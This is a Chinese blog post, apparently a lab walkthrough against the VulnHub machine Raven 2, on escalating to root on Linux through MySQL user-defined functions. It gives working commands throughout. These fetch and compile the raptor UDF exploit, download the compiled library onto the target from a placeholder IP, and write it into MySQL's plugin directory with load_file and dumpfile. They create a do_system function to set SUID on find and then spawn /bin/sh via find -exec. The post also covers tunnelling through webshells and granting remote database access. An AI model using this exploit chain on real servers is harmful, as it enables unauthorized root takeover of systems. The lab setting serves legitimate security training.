Linux提权--第三方软件MYSQL数据库提权(WEB+本地)

于 2024-05-12 17:30:39 发布
阅读量852 收藏 5
点赞数 22
分类专栏: # 权限提升 文章标签: 数据库 linux mysql web安全 网络安全 安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138760311
版权

免责声明:本文仅做技术交流与学习,非法搞事后果自负...

目录

靶场镜像:

过程:

手工:

下载mysql udf poc 进行编译.

进入数据库进行UDF导出

下载(上传)

创建do_system函数调用

探针(./LinEnum.sh),查找suid权限.

配合使用find调用执行

工具:

过程:

 外连不上?

隧道出网(域控) 

数据库开外连命令:

靶场镜像:

Raven: 2 ~ VulnHub

过程:

Vulnhub某靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用

Mysql提权Linux(Mysql版本区别同Windows)

手工:

下载mysql udf poc 进行编译.

wget https://www.exploit-db.com/download/1518

mv 1518 raptor_udf.c

gcc -g -c raptor_udf.c

gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

mv raptor_udf.so 1518.so

---下载1518.so---->上传到webshell上去.

上传或下载1518到目标服务器

wget https://xx.xx.xx.xx/1518.so

进入数据库进行UDF导出

(连接到数据库执行命令)

下载(上传)
use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile'/usr/lib/mysql/plugin/1518.so";
创建do_system函数调用
create function do_systemreturns integer soname'1518.so'

select do_system(chmod u+s /usr/bin/find');	
#给哪个命令一个执行权限

探针(./LinEnum.sh),查找suid权限.

--配合百科等等

find/-user root-perm -4000 -print 2>/dev/null

配合使用find调用执行

touch xiaodi

find xiaodi -exec "whoami"\;

find xiaodi -exec "/bin/sh"\;

id

工具:

Multiple.Database.Utilization.Tools-2.1.1

过程:

后门进去-->探针    Linenum.sh-->有mysql    --->找数据库的配置文件 -->用 **MDUTMDUT**连接,(这个连接有问题)--(开了外连还是连接不上)

---发现连接不上,-->用**哥斯拉**的后门连接mysql,执行命令,开启外链.

(用navicat连接试一下)

 外连不上?

连接不上,因为此靶场-->

防火墙过滤 .

开了外连 还是连接不上 查看user数据 已经设置外联.

外部到里面不行 --

1、手工提权(在webshell上面的数据库管理进行提权)自己连接自己

2.隧道出网(用外部或本机的工具项目提权建立隧道)

隧道出网(域控) 

里面出来外部

让webshell服务器3306转到本地的3300连接

--冰蝎内网穿透--http隧道 ----- MDUTMDUT连上直接提权.(数据库5种都能提)(不用考虑操作系统)

 --内网渗透后面详解...

数据库开外连命令:

GRANT ALL PRIVILEGES ON . TO '账号' IDENTIFIED BY '密码' WITH GRANT OPTION;

flush privileges;

金灰
关注
  • 22
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1087
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
Windows提权第三方应用
qq_61553520的博客
01-28 385
电脑(服务器)装的第三方应用越多,安全隐患越大。
Linux提权mysql UDF提权
waxcj的博客
12-16 2015
linux mysql数据库提权
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1784
第三方软件提权、Bypass UAC提权
mysql提权方式linux_Linux提权的几种常用方式
weixin_32124135的博客
02-28 439
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
一个基于 go-cqhttp 开发,以 MySQL 作为数据库的 qq 群功能型机器人.zip
最新发布
04-22
这种开放性促进了广泛的社区支持和第三方插件、工具的发展。此外,MySQL支持多种操作系统,包括Windows、Linux、macOS、Solaris等,确保了其在不同环境下的兼容性和部署灵活性。 关系型模型与SQL支持 MySQL基于关系...
竞拍网后台,基于springboot、mybatis-plus、jpa、mysql数据库已提供.zip
04-22
这种开放性促进了广泛的社区支持和第三方插件、工具的发展。此外,MySQL支持多种操作系统,包括Windows、Linux、macOS、Solaris等,确保了其在不同环境下的兼容性和部署灵活性。 关系型模型与SQL支持 MySQL基于关系...
基于 Vue+Vue-router+elementui +axios +nodejs+ mysql 的超市管理系统.zip
04-19
MySQL拥有庞大的开发者社区和丰富的第三方插件、库、中间件支持,提供了丰富的文档、教程、论坛以及专业服务,极大地简化了开发、运维和故障排查过程。 关键组件与日志 系统数据库 MySQL内部包含几个特殊的系统...
mysql mysql与其它数据库的对比
09-24
7. 数据库管理:Oracle提供了更多的数据库管理工具,例如Oracle Enterprise Manager,而MySQL则需要使用第三方工具或自己编写脚本来管理数据库。 与 SQL Server 对比: 1. 功能:SQL Server和MySQL都是关系型...
这是一个简单的学生管理系统网站,基于前端+flask框架+mysql数据库.zip
04-22
这种开放性促进了广泛的社区支持和第三方插件、工具的发展。此外,MySQL支持多种操作系统,包括Windows、Linux、macOS、Solaris等,确保了其在不同环境下的兼容性和部署灵活性。 关系型模型与SQL支持 MySQL基于关系...
第三方提权
一个普普通通的博客
04-17 1990
第三方提权 可以进入注册表查看装了哪些软件 搜狗输入法提权 原理:通过搜狗输入法的权限不严格,在默认安装搜狗输入法时,权限赋予过大,everyone(所有)权限(绝对控制) 通过伪造exe文件,例如更新程序,在对方进行软件更新或内容更新时,自动执行提前写好的bat脚本(quick batch) FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法 LPK劫持(dll劫持) 一种是需要程序本身的dll,根据函数仿制一个dll 另一种是直接生成一个恶意dl
第三方应用软件提权方法
m0_62207482的博客
03-09 344
3、Gene6 FTP 安全性测试(Gene6 FTP 默认安装路径是 C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini 其中 Remote.ini 是主配置文件,管理员登录的 ip、端口和密码都存储在这。2、FlashFXP 安全性测试(攻击者只需通过 webshell 下载 quick.dat、sites.dat、stats.dat这三个文件进行本地替换,就可以用星号查看器直接查看连接密 码)9、服务替换安全性测试。8、启动项安全性测试。
Linux 下安装mysql 5.7 --Centos7
Jerry00713的博客
05-21 814
1、下载: 方法一:官网下载地址:https://dev.mysql.com/downloads/mysql/5.7.html 方法二:连接: 2、安装: 1、解压tar.gz tar -zxvf mysql-5.7.26-linux-glibc2.12-x86_64.tar.gzi解压格式:tar zxvf 压缩后的路径及包名 你要压缩的文件 z:要解压的为gzip压缩 x:解压 v:显示打包压缩解压过程 f: 使用档案名字,切记,这个参数是最后一个参数,后面只能接档案名 2、移动并重命名(.
详谈利用系统漏洞及mysql提权
热门推荐
weixin_43526443的博客
01-25 7万+
提权,顾名思义就是提升权限,当我们 getshell ⼀个⽹站之后,⼤部分情况下我们的权限是⾮常低的,这时就需要利⽤提权,让原本的低权限(如只允许列⽬录)→ ⾼权限(拥有修改⽂件的能⼒),权限提升后,对接下来的渗透有很⼤帮助
linux mysql udf 提权
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 715
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
Mysql udf提权(Linux平台)
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysq
Linux MySQL Udf 提权
Coisini的博客
06-12 2159
前几天做一个小竞赛中有一个题目:给定的测试环境登录页面有POST注入漏洞,于是果断操起sqlmap跑数 据,无意中发现当前MySQL连接用户为root,于是想到udf提权「虽然Windows下MySQL提权基本上没问题,但是Linux环境下原来一直 没成功过。」,最终成功获取root权限「主要问题在于MySQL是以root权限运行」,记录笔记如下,方便以后查阅: 具体步骤如下 找到MySQL插件...
My-SQL-入门学习资料.docx
11-07
1.数据库的安装。 2.数据库的初始化。 3.数据的新建,表的新建编辑。 4.数据库的备份,删除。 5.数据库的远程登录。 6.Lamp平台的搭建。 7.Discuz论坛发布。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值